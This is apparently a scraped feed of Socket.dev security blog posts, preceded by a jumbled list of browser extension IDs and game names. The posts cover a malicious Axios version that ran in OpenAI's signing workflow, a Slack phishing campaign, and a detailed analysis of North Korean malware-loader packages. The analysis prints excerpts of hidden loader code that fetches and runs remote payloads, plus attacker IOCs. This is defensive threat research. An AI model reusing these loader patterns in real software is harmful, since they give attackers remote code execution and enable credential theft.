Freekickbdnanfggeppmkfhkgmpojkhanoplkacc - Slot Car Racingbgdkbjcdecedfoejdfgeafdodjgfohno - Clear Cache Plusbnchgibgpgmlickioneccggfobljmhjc - Galactica Delux - Slot Machinebpljfbcejldmgeoodnogeefaihjdgbam - Speed Test for Chrome - WiFi SpeedTestcbnekafldflkmngbgmbnfmchjaelnhem - Game SkySpeedstercdpiopekjeonfjeocbfebemgocjciepp - Master Chesscehdkmmfadpplgchnbjgdngdcjmhlfcc - Hockey Shootoutcljengcehefhflhoahaambmkknjekjib - Odds Of The Gods - Slot Machineclpgopiimdjcilllcjncdkoeikkkcfbi - Billiards Procmeoegkmpbpcoabhlklbamfeidebgmdf - Three Card Pokercmlbghnlnbjkdgfjlegkbjmadpbmlgjb - Donuts - Slot Machinecnibdhllkgidlgmaoanhkemjeklneolk - Archer - Slot Machinecpnfioldnmhaihohppoaebillnambcgn - Rugby Rushdbohcpohlgnhgjmfkakoniiplglpfhcb - Bingodcamdpfclondppklabgkfaofjccpioil - Web Client for game Cricket Batter Challengedljlpildgknddpnahppkihgodokfjbnd - Slot Machine Zeus Treasuresdlpiookhionidajbiopmaajeckifeehn - Horse Racingdmaibhbbpmdihedidicfeigilkbobcog - Aztec - Slot Machinedohenclhhdfljpjlnpjnephpccbdgmmb - Straight 4dpdemambcedffmnkfmkephnhhnclmcio - Slot The Gold Potejlcbfmhjbkgohopdkijfgggbikgbacb - American Roulette Royaleeljfpgehlncincemdmmnebmnlcmfamhm - Asia Slotenmmilgindjmffoljaojkcgloakmloen - Web Client for game Drive Your Careoklnfefipnjfeknpmigmogeeepddcch - Jurassic Giants - Slot Machinefddajeklkkggbnppabbhkdmnkdjindlo - Street Basketballfibgndhgobbaaekmnneapojgkcehaeac - Tarot Side Panelfjfhejmbhpabkacpoddjbcfandjoacmb - Dragon Slayer - Slot Machineflkdjodmoefccepdihipjdlianmkmhgc - Best Blackjackfmajpchoiahphjiligpmghnhmabolhoh - Book Of Magic - Slot Machinegaafhblhbnkekenogcjniofhbicchlke - Snake - Slot Machinegbaoddbbpompjhmilbgiaapkkakldlpc - Dice King - Classic Craps And Roll Gamegbhhgipmedccnankkjchgcidiigmioio - Slot Ramsesgfhcdakcnpahfdealajmhcapnhhablbp - Battleship Wargipmochingljoikdjakkdolfcbphmlom - Gold Miner 2glofhphmolanicdaddgkmhfmjidjkaem - Greyhound Racing - Dog Race Simulatorhaochenfmhglpholokliifmlpafilfdc - Hercules: Sports Legendhbobdcfpgonejphpemijgjddanoipbkj - Flicking Soccerhdmppejcahhppjhkncagagopecddokpi - Voodoo Magic - Slot Machineheljkmdknlfhiecpknceodpbokeipigo - Web Client for Hockey Shootout - SideGamehiofkndodabpioiheinoiojjobadpgmj - MASTER CHECKERShkbihmjhjmehlocilifheeaeiljabenb - Watercraft Rushhlmdnedepbbihmbddepemmbkenbnoegd - Car Rushhmlnefhgicedcmebmkjdcogieefbaagl - Video Poker Deuces Wildhnpbijogiiaegambgpaenjbcbgaeimlf - Slot Machine Ultimate Socceribelidmkbnjmmpjgfibbdbkamgcbnjdm - Christmas Eve - Slot Machineihbkmfoadnfjgkpdmgcboiehapkiflme - Columbus Voyage - Slot Machineijccacgjefefdpglhclnbpfjlcbagafm - High or Low Casino Gameijfmkphjcogaealhjgijjfjlkpdhhojk - Goalkeeper Challengeijpgccpmogehkjhdmomckpkfcpbjlmnj - Tropical Beach - Slot Machineimjmnghlhiimodfkdkgnfplhlobehnpm - BlackJack 3Djddinhnhplibccfmniaakhffpjpnaglp - Web Client for game Classic Bowlingjmopjanoebpdbopigcbpjhiigmjolikk - Raging Zeus Minesjnmmbmkmbkcccpihjgnhjmhhkokfdnfe - Classic Backgammonjodocbbdcdclkhjkibnlfhbmllcpfkfo - Slot Machine The Fruitskahcolfecjbejjjadhjafmihdnifonjf - Baccaratkblomapfkjidbbbdllmofkcakcenkmec - Mini Golf Worldkbmindomjiejdikjaagfdbdfpnlanobi - Gold Rush - Slot Machinekbnkkecifeppobnemkielnpagifkobki - Pirat Slotkjnakdbpijigdbfepipnbafnhbcfdkga - 40 Imperial Crown - Slot Machinekknakidneabpfgepadgpkibalcnabnnh - 3D Soccer Slot Machineklglejfbdeipgklgaepnodpjcnhaihkd - Premium Horse Racingkmiidcaojgeepjlccoalkdimgpfnbagj - Tanks Gamelcijkepobdokkgmefebkiejhealgblle - Caribbean Stud Pokerlefndgfmmbdklidbkeifpgclmpnhcilg - Wild Buffalo - Slot Machinelfkknbmaifjomagejflmjklcmpadmmdg - Aqua - Slot Machineljbgkfbiifhpgpipepnfefijldolkhlm - Game Crypto Mergelmcpbhamfpbonaenickjclacodolkbdl - Sherwood Forest - Slot Machinelmgenhmehbcolpikplhkoelmagdhoojn - Web Client for game Fatboy Dreammaeccdadgnadblfddcmanhpofobhgfme - Lone Star Jackpots - Slot Machinemedkneifmjcpgmmibfppjpfjbkgbgebl - Hidden Kitty Gamemheomooihiffmcgldolenemmplpgoahn - Kenommbbjakjlpmndjlbhihlddgcdppblpka - Jokers Bonanza - Slot Machinemmbkmjmlnhocfcnjmbchmflamalekbnb - Penalty Kicksnbgligggjfgkpphhghhjdoiefbimgooc - Pai Gow Pokerncpdkpcgmdhhnmcjgiiifdhefmekdcnf - Metal Calculatorndajcmifndknmkckdcdefkpgcodciggk - Farm - Slot Machinenelbpdjegmhhgpfcjclhdmkcglimkjpp - Rail Maze Puzzlenkacmelgoeejhjgmmgflbcdhonpaplcg - RED DOG CARD GAMEnmegibgeklckejdlfhoadhhbgcdjnojb - Coin Miner 2nodobilhjanebkafmpihkpoabiggnnfl - Black Ninja - Slot Machineoanpifaoclmgmflmddlgkikfaggejobn - Pyramid Solitaireocflhkadmmnlbieoiiekfcdcmjcfeahe - Chrome Client for Downhill Ski - SideGameodeccdcabdffpebnfancpkepjeecempn - Slot Machine Mr Chickenoejhnncfanbaogjlbknmlgjpleachclf - Web Client for French Roulette - SideGameogbaedmbbmmipljceodeimlckohbnfan - 3D Roulette Casino Gameojkbafekojdcedacileemekjdfdpkbkf - Slot Machine Space Adventurepdgaknahllnfldmclpcllpieafkaibmf - Whack 'em Allpeflgkmfmoijonfgcjdlpnnfdegnlaji - Video Poker Jacks or Betterphfkdailnomcbcknpdmokejhellbecjb - Swimming Propkghgkfjhjghinikeanecbgjehojfhdg - InterAltpllkanemicadpcmkfodglahcocfdgkhj - Gold of Egypt - Slot MachineThe recent compromise of the widely used Axios library has now been linked to downstream impact on software distribution pipelines, after OpenAI disclosed that a malicious version of the package was executed inside its macOS app signing workflow.
The incident adds a new dimension to the ongoing supply chain campaign that has already targeted high-impact Node.js maintainers through a social engineering campaign attributed to North Korean actors.
According to OpenAI, the issue originated on March 31, 2026, when a GitHub Actions workflow used in its macOS app-signing process downloaded and executed a compromised version of Axios (1.14.1).
The workflow had access to sensitive signing materials, including certificates used to notarize macOS applications such as ChatGPT Desktop, Codex, and Atlas. These certificates are critical to establishing trust, allowing macOS to verify that software originates from a legitimate developer.
OpenAI stated that multiple mitigating factors likely prevented successful exfiltration of the signing certificate, but still treated the material as potentially compromised.
In response, the company revoked and rotated its macOS code signing certificate and rebuilt affected applications with new credentials. OpenAI is requiring macOS users to update to the latest versions of its desktop apps as part of the certificate rotation. Older versions will stop receiving updates and may stop functioning after May 8, 2026
The company also confirmed it is working with Apple to block further notarization attempts using the previous certificate, reducing the risk of malicious software being distributed under its identity.
Despite the exposure, OpenAI reported no evidence that user data, internal systems, or production software were compromised.
OpenAI identified CI pipeline misconfiguration as the source of the exposure:
The root cause of this incident was a misconfiguration in the GitHub Actions workflow, which we have addressed. Specifically, the action in question used a floating tag, as opposed to a specific commit hash, and did not have a configured minimumReleaseAge for new packages.
This combination allowed the compromised Axios version to be pulled into the build process at runtime.
While the Axios compromise was already notable for its reach across the JavaScript ecosystem, this disclosure shows how attacks on widely adopted dependencies can propagate into the build and release workflows of large-scale production systems.
Compromising CI pipelines or signing workflows introduces the potential for attackers to distribute trusted, signed software, one of the most damaging outcomes in a supply chain attack.
This is one example of how close supply chain attacks can come to the nightmare scenario, where automated workflows routinely pull and execute third-party dependencies with access to sensitive credentials. Even organizations with mature security practices can unintentionally introduce exposure when build systems automatically pull the latest version of a dependency.
CI/CD pipelines are getting hammered as a preferred entry point for attackers in the latest supply chain attacks, and the consequences are starting to surface across the ecosystem. In this case, OpenAI reports that the attack did not result in downstream compromise.
The disclosure, published late on a Friday, drew immediate reactions from developers and users on social media.
\n \n\n
Some users appeared to be learning about the Axios compromise for the first time, asking whether their systems were affected or seeking clarification on the impact. Others questioned the timing or expressed skepticism about the scope of the incident, while some praised the transparency of the disclosure and the response.
The range of reactions shows that these attacks are still largely tracked by security teams and maintainers, while many downstream users are only likely to learn about them once they surface through major vendor disclosures.
","summary":"OpenAI rotated macOS signing certificates after a malicious Axios package reached its CI pipeline in a broader software supply chain attack.","image":"https://cdn.sanity.io/images/cgdhsj6q/production/e63284e36b421984c4ee5872b0620a692924dfca-1024x1024.png?w=1000&q=95&fit=max&auto=format","banner_image":"https://cdn.sanity.io/images/cgdhsj6q/production/e63284e36b421984c4ee5872b0620a692924dfca-1024x1024.png?w=1000&q=95&fit=max&auto=format","date_published":"2026-04-11T03:14:22.225Z","author":{"name":"Sarah Gooding"},"tags":["Security News"]},{"id":"https://socket.dev/blog/dont-kill-the-goose-that-lays-the-golden-eggs","url":"https://socket.dev/blog/dont-kill-the-goose-that-lays-the-golden-eggs?utm_medium=feed","title":"Don't Kill the Goose That Lays the Golden Eggs","content_html":"March 2026 was a bad month. Back-to-back supply chain attacks with incident response teams running nonstop, real damage across ecosystems that millions of developers depend on, and legitimate questions about how we secure critical infrastructure. What it didn't have was an excuse to write an obituary for open source.
In the wake of the attacks, familiar criticism has been making the rounds. It's a hot take dressed up as a reckoning. The argument goes something like this: open source is fundamentally broken, the trust model is collapsing, and the only real solution is to stop relying on software you don't control. It's one thing when randos hail "the death of open source" on Reddit. It's another thing entirely when it comes from companies that have spent years cashing in on that unpaid labor.
We’ve seen this before: a handful of companies that benefit enormously from open source declare it broken or "dead" under pressure, even as they push to extract more from the very community they depend on.
A 2024 Harvard study estimated the demand-side value of widely used open source at $8.8 trillion, what it would cost firms to recreate the software they use for free. Every CISO with a budget to spend on supply chain security tools has that budget because open source made it cheap enough to build the software those tools protect.
This was a deliberate bet on openness, and it paid off. Everyone has been collecting on that bet for decades and is now surprised that it’s a target.
Open source is not dying. It has become so ubiquitous that attackers have learned compromising one upstream package is more efficient than targeting individual organizations. That is a statement about attacker economics, not about open source architecture. Closed-source supply chains have exactly the same exposure to this strategy, just with less transparency. Attackers go where the value is.
These were not typical opportunistic attacks. TeamPCP is targeting OSS security tools and CI/CD pipelines because that gives them a goldmine of credentials to exploit. The Axios compromise, which delivered write access to npm for a package downloaded 100M times per week, was a weeks-long social engineering campaign targeting the highest-trust maintainers in the Node.js ecosystem. Multiple Socket engineers, including our CEO, were among those targeted by this same North Korean campaign. The ecosystem is under attack because of how much value it creates. That is an argument for supporting it, not declaring it dead.
The people building this infrastructure are mostly unpaid solo maintainers carrying an increasingly heavy security burden. When they burn out or make a mistake, the whole ecosystem is vulnerable. The appropriate response to their work being targeted by nation-state actors should not be to warn enterprises away from their packages. It should be to fund, support, and protect them.
Socket was founded by open source maintainers. Our team maintains software downloaded billions of times a week. We are not observing this ecosystem from a safe distance. We are in it with you, and have been for most of our careers. We're betting on the future of open source, and we intend to keep making it safer for everyone to use.
","summary":"Open source is under attack because of how much value it creates. It has been the foundation of every major software innovation for the last three decades. This is not the time to walk away from it.","image":"https://cdn.sanity.io/images/cgdhsj6q/production/8aaae4fa4ef594bdc28d44462a41495700b70f9e-1024x1024.png?w=1000&q=95&fit=max&auto=format","banner_image":"https://cdn.sanity.io/images/cgdhsj6q/production/8aaae4fa4ef594bdc28d44462a41495700b70f9e-1024x1024.png?w=1000&q=95&fit=max&auto=format","date_published":"2026-04-10T01:27:33.672Z","author":{"name":"Sarah Gooding"},"tags":["Security News"]},{"id":"https://socket.dev/blog/feross-on-tbpn-how-north-korea-hijacked-axios","url":"https://socket.dev/blog/feross-on-tbpn-how-north-korea-hijacked-axios?utm_medium=feed","title":"Feross on TBPN: How North Korea Hijacked Axios","content_html":"Socket CEO Feross Aboukhadijeh joined the TBPN podcast today to break down the Axios npm supply chain attack, one of the most significant open source compromises in recent months. TBPN, recently acquired by OpenAI, is a live daily tech show hosted by John Coogan and Jordi Hays.
Feross walked through how North Korean state actors socially engineered the lead Axios maintainer over weeks, building a fake company, a fake Slack workspace, and a staged Microsoft Teams call before delivering malware disguised as a software update in order to own his machine. That gave them publish access to npm.
On why these attacks keep working: "The whole software supply chain is built on blind trust. You're downloading code from random people on the internet that you've never met and you're like, let's just run it." He also points to a fundamental asymmetry: "Defenders have a much harder job than attackers because they have to guard against all the ways that you can possibly get attacked. The attacker has to just find one way in."
Feross addressed what's on every security team's mind right now: is AI making this worse, who has the advantage, and is there actually a path out of this. Despite the current wave of attacks, he sees AI shifting the balance: "For the first time, defenders now have an infinitely scalable army of AI agents doing their bidding and doing continuous security analysis, and that's all work that would've been way too expensive or impractical for humans to do before."
A social engineering campaign is actively targeting open source developers through Slack, according to a high-severity advisory posted April 7 to the OpenSSF Siren mailing list. The attacker impersonates a known Linux Foundation community leader to lure victims into a multi-stage attack that ends with malware delivery and potential full system compromise.
OpenSSF Siren is a public threat intelligence mailing list run by the Open Source Security Foundation (OpenSSF), a Linux Foundation project. It was created to fill a gap that became visible after incidents like the XZ Utils backdoor: the open source community had ways to coordinate on vulnerability disclosure, but no centralized channel for sharing active threat intelligence with the broader downstream audience, including security researchers and developers who aren't plugged into upstream communication channels.
Siren is post-disclosure by design. It covers active threats and attack patterns after initial coordination has occurred, distributing indicators of compromise, tactics, and response guidance to the people who need it.
The latest advisory was authored by Christopher "CRob" Robinson, CTO and Chief Security Architect at OpenSSF.
The attack targeted the Slack workspace of the TODO Group, a Linux Foundation working group for open source program office (OSPO) practitioners, and related communities. In the reported incident, the attacker posed as a well-known Linux Foundation community leader and sent a message directing the target to follow a link:
https://sites.google.com/view/workspace-business/join
The URL uses Google Sites infrastructure to appear legitimate, but clicking it takes the victim through a fake authentication flow that harvests their email address and a verification code. After credential collection, the site instructs the victim to install a "Google certificate," which is in fact a malicious root certificate.
From there, the attack diverges by platform. On macOS, a script downloads and executes a binary called gapi from a remote IP address (2.26.97.61). On Windows, the victim is prompted to install the malicious certificate through a browser trust dialog. In both cases, the certificate enables interception of encrypted traffic. On macOS, executing the binary may result in full system compromise.
The full attack chain involves four stages: impersonation, phishing, credential harvesting, and malware delivery.
A Socket engineer who is a member of the TODO Group Slack received a direct message from the attacker's account. The attacker, posing as a Linux Foundation community leader, used an AI tool pitch as the lure: claiming to be working on a private tool that analyzes open source project dynamics and could predict which contributions would get merged before any review occurred. The pitch emphasized exclusivity, telling the recipient the team was "only sharing this with a few people for now."
The message included the exact phishing URL from the advisory (https://sites.google.com/view/workspace-business/join), along with a fake email address (cra@nmail.biz) and an access key (CDRX-NM71E8T) designed to make the fake workspace flow appear legitimate.
The account has since been deactivated, consistent with TODO Group admins removing it after the advisory circulated, which is why the username appears as "deactivateduser."
The campaign exploits the trust relationships that make open source communities function. Developers in communities like the TODO Group are accustomed to receiving outreach from recognized names, including project leads, foundation staff, and community organizers. An attacker who can convincingly impersonate one of those figures has a significant social advantage before a single malicious link is clicked.
The use of Google Sites for the phishing page is deliberate. The domain (sites.google.com) is legitimate infrastructure, which means it will pass casual inspection and may bypass some security filters. The fake certificate prompt is also designed to look routine, framed as a workspace configuration step rather than a security risk.
Last week, we reported on a coordinated campaign targeting high-impact Node.js maintainers, including the leads of Fastify, Lodash, dotenv, and Node.js core itself, as well as several Socket engineers. The attackers are using the same social engineering playbook that compromised Axios, and Mandiant researchers have linked this campaign to a DPRK-nexus threat actor. Whether that campaign and this one share any connection is unknown, but there's a clear trend towards open source maintainers being targeted through the platforms and relationships they rely on to do their work.
The OpenSSF advisory recommends the following for anyone active in Linux Foundation Slack communities or similar spaces:
Verify identities out of band. Do not trust a Slack message based on name or profile photo alone. If someone you recognize sends an unusual request, confirm it through a separate, known communication channel before acting.
Do not install certificates from links. Legitimate services do not ask users to manually install root certificates. Any such request should be treated as malicious unless explicitly verified by your organization's IT team.
Do not execute downloaded binaries or scripts. This includes any file received via Slack or from a website you were directed to through a message. Avoid running commands that download and execute code, such as curl | bash patterns.
Treat unexpected security prompts as suspicious. Messages about expired certificates or urgent authentication requirements should be independently verified before acting on them.
If you may have been affected, the advisory recommends disconnecting from the network immediately, removing any newly installed certificates, running endpoint security scans, rotating all credentials (GitHub, SSH keys, cloud access), and revoking active sessions and tokens.
The advisory also recommends enabling multi-factor authentication on all developer and collaboration accounts. This will not stop impersonation-based attacks, but it limits the blast radius if credentials are harvested.
Indicators of compromise: phishing URL https://sites.google.com/view/workspace-business/join, fake email cra@nmail.biz, access key CDRX-NM71E8T, remote IP 2.26.97.61, macOS binary named gapi.
We have been tracking North Korea’s Contagious Interview operation since 2024 and maintain a dedicated campaign page that now tracks more than 1,700 malicious packages linked to the activity. In this newly identified cluster, the threat actors operated under GitHub aliases including golangorg and published malicious packages across five open source ecosystems:
dev-log-core, logger-base, logkitxlogutilkit, apachelicense, fluxhttp, and license-utils-kitgithub[.]com/golangorg/formstashlogtracegolangorg/logkitThe threat actor’s packages were designed to impersonate legitimate developer tooling (such as debug, debug-logfmt, pino-debug, baraka, license, http, libprettylogger, and openlss/func-log), while quietly functioning as malware loaders, extending Contagious Interview’s established playbook into a coordinated cross-ecosystem supply chain operation.
The infrastructure, package construction, staging logic, and use of fake developer tooling are all consistent with Contagious Interview’s established tradecraft. Across the cluster, the loaders retrieve a downloadUrl from threat actor-controlled infrastructure, rewrite Google Drive sharing links into direct-download form, fetch ZIP archives such as ecw_update.zip, and deliver platform-specific second-stage payloads. Our analysis ties the activity to infrastructure including apachelicense[.]vercel[.]app, ngrok-free[.]vercel[.]app, logkit.onrender[.]com, logkit-tau[.]vercel[.]app, 66[.]45[.]225[.]94, and Google Drive-based delivery patterns.
The primary objective appears to be a RAT-enabled infostealer operation focused on stealing credentials, browser data, password-manager contents, and cryptocurrency wallet data. But the Windows-heavy variant license-utils-kit goes further: it bundles a full post-compromise implant with capabilities consistent with remote shell execution, keylogging, browser and wallet theft, sensitive-file collection, encrypted archiving, and remote-access deployment. That makes this cluster notable not just for its cross-ecosystem reach, but for the depth of post-compromise functionality embedded in at least part of the campaign.
On PyPI packages, public reporting from Bad Packages also surfaced second-stage evidence hashes 9a541dffb7fc18dc71dbc8523ec6c3a71c224ffeb518ae3a8d7d16377aebee58 and bb2a89001410fa5a11dea6477d4f5573130261badc67fe952cfad1174c2f0edd, while Zscaler identified an additional Python-based RAT payload with SHA-256 7c5adef4b5aee7a4aa6e795a86f8b7d601618c3bc003f1326ca57d03ec7d6524.
We reported all identified live malicious packages to the affected registries and submitted takedown requests for the associated GitHub accounts. Some have already been taken down, while others remained live at the time of writing. This malicious cluster reinforces our prior reporting that Contagious Interview is a well-resourced, prolific, and systematic factory-model supply chain threat that treats npm, PyPI, and VS Code as renewable initial access channels into developer environments and, based on our current investigation, extends that same playbook to Go Modules, crates.io, and Packagist.
Screenshot of the threat actor’s golangorg GitHub account showing the current public repositories tied to the cluster we investigated. At the time of capture, the account hosted log-base, dev-log, and logger-base (linked to the malicious npm loader line anchored by dev-log-core); logutilkit (malicious PyPI package logutilkit); formstash (malicious Go module github[.]com/golangorg/formstash); and logkit (malicious Packagist package golangorg/logkit). The malicious Rust crate logtrace is also tied to the same GitHub account and persona. Together, these packages show the operation spanning JavaScript, Python, Go, Rust, and PHP from a single alias.
Most of these packages follow the same loader workflow. They contact https://apachelicense.vercel.app/getAddress?platform=<platform> with an HTTP POST, parse a JSON downloadUrl, download a zip archive, extract it into a temp directory, find a platform-specific payload, and execute it. They repeatedly reuse the same constants, paths, and filenames, including ecw_update.zip, the extraction directory 410BB449A-72C6-4500-9765-ACD04JBV827V32V, and Unix-like payload names such as com.apple.systemevents and systemd-resolved.
The most consistent tradecraft is where the malware sits. The threat actors did not generally rely on install-time execution. Instead, the malicious path is hidden behind a function that looks normal for the package’s claimed purpose.
In logutilkit, the trigger sits in the generic logger method. Here and below, the code snippets are taken directly from the analyzed packages, with our inline comments added and sensitive indicators defanged where appropriate.
def log(self, level, msg, *args, **kwargs):\n logutilkit_util.check_for_updates(level) # Hidden staged loader\n self.logger.log(level, msg, *args, **kwargs)In apachelicense and license-utils-kit, the trigger is hidden in find_by_key(), a believable helper name for a license library:
def find_by_key(key, value, multiple=True):\n if sys.platform == 'win32':\n ...\n cmd = [python_exe, script_path, '-t', str(value)]\n proc = subprocess.Popen(cmd, **popen_kwargs)\n # Hidden subprocess launch from a license lookup helper\n else:\n custom_util.check_for_updates(value)\n # Linux/macOS trigger the shared loaderSocket AI Scanner’s analysis of the malicious apachelicense package shows a high-confidence malicious package detection. Our review found the trigger hidden in apachelicense/core.py’s find_by_key() function, which hands execution to a staged loader in custom_util.py that contacts apachelicense[.]vercel[.]app, retrieves a downloadUrl, downloads ecw_update.zip, and launches platform-specific payloads.
In logtrace, the malicious code sits in Logger::trace(i32), a method name that looks perfectly normal in a logging crate:
pub fn trace(&self, t_value: i32) {\n const EXTRACT_DIR: &str = "410BB449A-72C6-4500-9765-ACD04JBV827V32V";\n\n fn get_api_url() -> String {\n format!(\n "https://apachelicense[.]vercel[.]app/getAddress?platform={}",\n get_platform().api_value()\n )\n // Shared staging endpoint\n }This screenshot shows the logtrace crate while it was still live on crates.io under the golangorg persona; our analysis found that its Logger::trace(i32) method hid a staged loader, and after we reported it, the crates.io security team promptly removed both the malicious crate and the associated account. We thank the crates.io team for their swift action.
In github[.]com/golangorg/formstash, the module is mostly a real multipart parser, but it also exposes a malicious helper that has no place in that codebase:
func CheckForUpdates(tValue int) bool {\n zipPath := filepath.Join(os.TempDir(), "ecw_update.zip")\n ...\n if getPlatform() == "py" {\n ...\n cmd := exec.Command(pyPath, "-c", string([]byte(decodedStr)))\n // Executes threat actor-supplied decoded code\n } else {\n execute(target, tValue)\n }\n return true\n}This screenshot shows the malicious github[.]com/golangorg/formstash Go module while it was still listed as a legitimate multipart parsing library; our analysis found that parser.go also exposed an unrelated CheckForUpdates(int) helper that contacted apachelicense[.]vercel[.]app, downloaded ecw_update.zip, and launched platform-specific payloads, illustrating how the threat actor hid a staged loader inside an otherwise functional package. After our report, the Go Security team blocked this and the associated malicious Go modules we identified; we thank them for their swift action in helping keep the Go ecosystem safe.
The identified PHP package golangorg/logkit extends the same loader family into Packagist. It presents itself as a lightweight logging library, and write_log() performs real logging, but the hidden malicious path sits in the undocumented helper log_level($tag=1). That function contacts apachelicense[.]vercel[.]app, retrieves a JSON downloadUrl, downloads a zip archive, rewrites Google Drive links into direct-download form, extracts a platform-specific payload, and executes it. On Windows, it goes further by fetching an additional encoded stage from apachelicense[.]vercel[.]app/getAddress?platform=logmain&id=LOG, decoding it, and launching it with -c. That places the PHP package in the same broader staged-loader cluster observed in the Python, Go, and Rust samples.
This pattern makes the packages harder to spot during casual review. The malware is not hidden behind an obviously suspicious entrypoint. It is hidden behind routine-looking application logic.
function log_check()\n{\n return 'https://apachelicense[.]vercel[.]app/getAddress?platform=' . log_get_info();\n // Shared staging endpoint\n}\n\nfunction log_level($tag=1)\n{\n $zippath = log_tempdir().'/logbundle_tmp.zip';\n ...\n $url = log_get_meta();\n if($url===null) return false;\n ...\n}This screenshot shows the Packagist alias aokisasakidev while its PHP package set was still live; our analysis found that golangorg/logkit was a staged malware loader that reused the structure and metadata of openlss/func-log, extending the same cross-ecosystem campaign into Packagist.
Instead of downloading and extracting a zip archive, the npm packages (e.g. dev-log-core) fetch a base64-encoded JavaScript payload and execute it in memory.
constresponseData=awaitresponse.json();\nconstencodedMessage=responseData.message; // Server supplies the payload\nconstdecodedCode=Buffer.from(encodedMessage,'base64').toString('utf8');\n\nconstdebugFunction=newFunction('require',decodedCode)(require);\n// Executes threat actor-controlled JavaScript with access to require()That makes most of the npm packages in the cluster materially different from the Python, Go, Rust, and PHP staged loaders. Their infrastructure also varies across versions, including ngrok-free[.]vercel[.]app, logkit[.]onrender[.]com, and logkit-tau[.]vercel[.]app. Even so, the underlying idea is the same: hide a remotely controlled loader behind a plausible library API.
Socket AI Scanner’s analysis of the malicious dev-log-core package identifies a hidden remote code loader in src/common.js: when enable(namespaces) runs, it sends a POST request to logkit-tau[.]vercel[.]app, decodes a base64 message field from the response, and executes it with new Function(...), giving the remote service arbitrary code execution inside the consuming Node.js process.
This screenshot shows the npm persona aokisasakidev1 while its package set was still live; our analysis linked dev-log-core to the same malicious cluster, while logger-base and logkitx appeared to be sleeper packages (i.e. code published in advance under the same developer-tool disguise, but not yet carrying an active malicious payload at the time of analysis).
license-utils-kit is the most capable package in the set. On Linux and macOS it still follows the familiar apachelicense[.]vercel[.]app zip-staging workflow. On Windows, however, it ships much more than a thin loader. It bundles obfuscated components that, once deobfuscated, reveal browser theft, wallet theft, sensitive-file collection, and remote access functionality.
The clearest example is the recovered RAT command map:
self.command_handlers = {\n 1: self.execute_shell_command,\n 2: self.handle_delete_command,\n 3: self.get_keylog_buffer,\n 4: self.run_browser_stealer,\n 5: self.handle_upload_command,\n 6: self.kill_browsers,\n 7: self.deploy_anydesk,\n 8: self.upload_sensitive_files,\n 9: self.create_encrypted_archive,\n 10: self.run_additional_module\n}\n# Remote shell, browser theft, keylogging, AnyDesk deployment, and moreThis package also introduces a second infrastructure cluster centered on 66[.]45[.]225[.]94, and it is the clearest example of a fuller post-compromise implant chain.
The packages reuse the same downloadUrl workflow, archive name, extraction directory, platform-specific payload names, and the same habit of hiding malware behind normal-looking methods. Several also share Windows-specific staging logic, including a second-stage API value that resolves to platform=main.
aokisasakidev AliasAs the investigation expanded beyond the golangorg GitHub account, we identified a closely related alias, aokisasakidev, by pivoting from package and maintainer metadata tied to the same cluster. The strongest clue came from npm: packages linked to the malicious activity, including dev-log-core and logger-base, pointed to aokisasakidev repository paths. That redirect overlap tightened the link between the two personas and suggested that aokisasakidev was not an unrelated developer account, but part of the same malicious campaign.
Socket’s analysis of the npm maintainer alias aokisasakidev shows three debug-themed packages, pino-debugger, debug-glitz, and debug-fmt, each identified as malicious. The naming pattern extends the same logging and utility impersonation theme seen elsewhere in the cluster. The packages and the maintainer account were removed by the npm security team.
That pivot surfaced additional Go module github[.]com/aokisasakidev/mit-license-pkg, which provides direct code-level evidence linking the alias to the broader loader cluster. Its only Go source file, pkg/mitlicense/mitlicense.go, does not implement meaningful license functionality. Instead, it posts to apachelicense[.]vercel[.]app, retrieves a JSON downloadUrl, downloads ecw_update.zip, rewrites Google Drive links to drive.usercontent.google.com, decodes an obfuscated second-stage URL, fetches another server-controlled payload, writes the decoded result to a temporary script, and executes it with py.exe.
maxcointech1010 Alias\n #\nAs the investigation expanded beyond the golangorg, aokisasakidev1 , and aokisasakidev personas, we identified another related GitHub alias: maxcointech1010. Unlike golangorg, which was closely tied to a cluster of malicious packages, maxcointech1010 appeared to serve a different role. The account was populated with dozens of cloned or lightly modified repositories spanning AI projects, interview-themed applications, blockchain tooling, trading bots, and offensive utilities such as obfuscators, shellcode loaders, wallet tools, and browser-data theft projects. That mix suggested a broader staging and persona-building function rather than a narrow package-publishing identity.
GitHub overview of the maxcointech1010 alias shows a broad, developer-facing portfolio spanning mobile commerce, AI, and full-stack applications, a profile more consistent with persona building than with a focused maintainer identity.
Many of the repositories preserved the names, structure, and metadata of legitimate upstream projects, making the account look like an active developer profile with wide-ranging interests across modern software themes. In practice, maxcointech1010 looked less like a clean registry publisher and more like a cloned-project persona that could be used to host, collect, and present plausible developer content.
We also identified a closely related GitHub account, maxcointech0000. In several cases, repository paths and search results appeared to cross over between the two accounts, suggesting that maxcointech0000 was likely a sibling namespace, prior alias, or otherwise operationally linked account rather than an unrelated developer profile.
Taken together, that overlap suggests that maxcointech1010 was not a standalone GitHub identity, but part of a broader persona set. That made it operationally valuable to the threat actor: it extended the actor’s footprint beyond obviously malicious packages and into a wider GitHub presence that could support lures, code reuse, infrastructure staging, and social proof. In that sense, maxcointech1010 appears to have served as a supporting persona, not necessarily the primary package publisher, but one that made the operation look larger, more active, and more legitimate.
This is still a developing story. The campaign page already tracks more than 1,700 malicious packages linked to Contagious Interview, and this cluster shows the threat actors extending the same playbook across npm, PyPI, Packagist, Go Modules, and crates.io. The overlap in staging logic, infrastructure, and persona reuse suggests the threat actors can keep porting the same loader design into new registries with only minor code changes. Some packages were removed after reporting, but others remained live at the time of writing.
Treat utility packages as high risk if they contact remote infrastructure, retrieve a downloadUrl, rewrite cloud-storage links, download archives, decode remote content, or spawn interpreters or binaries. Pin direct and transitive dependencies, scrutinize newly published or low-download packages before adoption, and sandbox suspicious packages before they reach developer workstations or CI systems. Watch especially for unexpected child processes launched by loggers, parsers, lookup helpers, or “update” functions.
For defenders, the priority is faster clustering. Preserve registry metadata, maintainer aliases, repository links, staging domains, archive names, extraction paths, and payload names so one malicious package can be tied to adjacent personas, ecosystems, and new waves. In campaigns like this, the fastest wins come from linking repeated loader patterns before the threat actors rotate infrastructure or publish the next cluster. We will continue tracking this cluster and monitoring Contagious Interview activity as new packages and related personas emerge.
dev-log-corelogkitx — sleeper package; not yet weaponizedlogger-base — sleeper package; not yet weaponizedpino-debuggerdebug-fmtdebug-glitzapachelicense[.]vercel[.]appngrok-free[.]vercel[.]applogkit.onrender[.]comlogkit-tau[.]vercel[.]app66[.]45[.]225[.]94drive[.]google[.]com/file/d/<file_id>drive[.]usercontent[.]google[.]com/download?id=<file_id>&export=download&confirm=tAliases
